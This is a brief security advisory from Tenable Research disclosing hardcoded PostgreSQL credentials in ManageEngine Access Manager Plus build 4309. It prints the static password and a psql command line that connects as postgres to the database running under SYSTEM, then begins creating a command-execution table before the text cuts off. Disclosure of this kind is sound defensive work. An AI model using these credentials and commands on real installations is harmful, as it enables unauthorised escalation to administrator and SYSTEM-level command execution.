Zoho ManageEngine Disclosure of Hardcoded Credentials
Tenable Research Advisories www.tenable.com
Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.
The PostgreSQL database server used in AMP is run under the SYSTEM account:

C:\Program Files\ManageEngine\AMP\pgsql\bin>set PGPASSWORD=Stonebraker&& psql -h 127.0.0.1 -p 4567 -d AMP -U postgres -q
AMP=# DROP TABLE IF EXISTS cmd_exec; …